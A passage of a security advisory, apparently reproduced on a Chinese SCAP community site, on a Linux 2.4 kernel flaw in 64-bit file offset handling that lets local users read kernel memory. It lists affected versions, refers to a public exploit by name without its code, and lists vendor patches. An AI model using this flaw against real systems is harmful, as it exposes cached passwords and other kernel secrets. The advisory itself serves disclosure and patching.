+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18 pre-8
Linux kernel 2.4.18 pre-7
Linux kernel 2.4.18 pre-6
Linux kernel 2.4.18 pre-5
Linux kernel 2.4.18 pre-4
Linux kernel 2.4.18 pre-3
Linux kernel 2.4.18 pre-2
Linux kernel 2.4.18 pre-1
Linux kernel 2.4.18 x86
+ Debian Linux 3.0 ia-32
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
+ Sun Cobalt RaQ 550
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.4.0-test9
Linux kernel 2.4.0-test8
Linux kernel 2.4.0-test7
Linux kernel 2.4.0-test6
Linux kernel 2.4.0-test5
Linux kernel 2.4.0-test4
Linux kernel 2.4.0-test3
Linux kernel 2.4.0-test2
Linux kernel 2.4.0-test12
Linux kernel 2.4.0-test11
Linux kernel 2.4.0-test10
Linux kernel 2.4.0-test1
Linux kernel 2.4

- Unaffected program versions

Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.4.27 -pre5
Linux kernel 2.4.27 -pre4
Linux kernel 2.4.27 -pre3
Linux kernel 2.4.27 -pre2
Linux kernel 2.4.27 -pre1

- Vulnerability discussion

A vulnerability in the Linux kernel in the 64-bit file offset handling code may allow malicious users to read kernel memory. This issue is due to a design error that causes the affected code to fail to properly validate file pointers.

An attacker may leverage this issue to read arbitrary Linux kernel memory. This could allow an attacker to read sensitive data such as cached passwords. This issue will certainly aid in further attacks against the affected computer.

It has been reported that the Linux 2.6.X kernel, although still vulnerable, might not be exploitable. This BID will be updated when more information becomes available.

- Exploit

The exploit provided by iSEC Security Research (proc_kmem_dump.c) is reproduced above under EDBID:375. It is reported to trigger this issue on 2.4.x kernels and not on 2.6.x kernels.

- Solution

SGI has made available Patch 10096 and advisory (20040804-01-U), correcting this and other vulnerabilities for systems running SGI ProPack 3.

Patch 10096 is available from:
ftp://patches.sgi.com/support/free/security/patches/ProPack/3/

Please see the referenced advisory for further details regarding obtaining and applying appropriate updates.

RedHat Linux has released advisory FEDORA-2004-251 that addresses this issue for Fedora Core 1. Fedora users may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Trustix Secure Linux has released advisory TSLSA-2004-0041 to address this, and other issues. Please see the referenced advisory for further information.

Red Hat has released advisory RHSA-2004:418-05 and RHSA-2004:413-07 and fixes to address this and other issues on Red Hat Linux Enterprise 2.1 and 3.0 platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Red Hat Fedora has released advisory FEDORA-2004-247 along with fixes dealing with this issue. Please see the referenced advisory for further details.

SuSE has released advisory SUSE-SA:2004:024 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Red Hat has released advisory RHSA-2004:327-09 along with fixes to address this issue for Red Hat Enterprise Linux 2.1 for Itanium processors. Please see the referenced advisory for further information.

Gentoo has released advisory GLSA 200408-24 to address this issue. Please see the attached advisory for further information on how to upgrade the kernel on Gentoo computers.

Mandrake has released an advisory (MDKSA-2004:087) to address this issue. Please see the referenced advisory for more information.

Conectiva has released an advisory (CLA-2004:879) to address this issue. Please see the referenced advisory for more information.

VMware has released an advisory dealing with this issue for their ESX Server virtual machine packages. Please see the Web reference for more information.


VMWare ESX Server 2.0.1

VMWare ESX Server 2.1.1

VMWare ESX Server 2.1.2

Linux kernel 2.4.18

Linux kernel 2.4.19

Linux kernel 2.4.21

Linux kernel 2.4.22

Linux kernel 2.4.25

Linux kernel 2.6.3

Linux kernel 2.6.4

Linux kernel 2.6.5


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.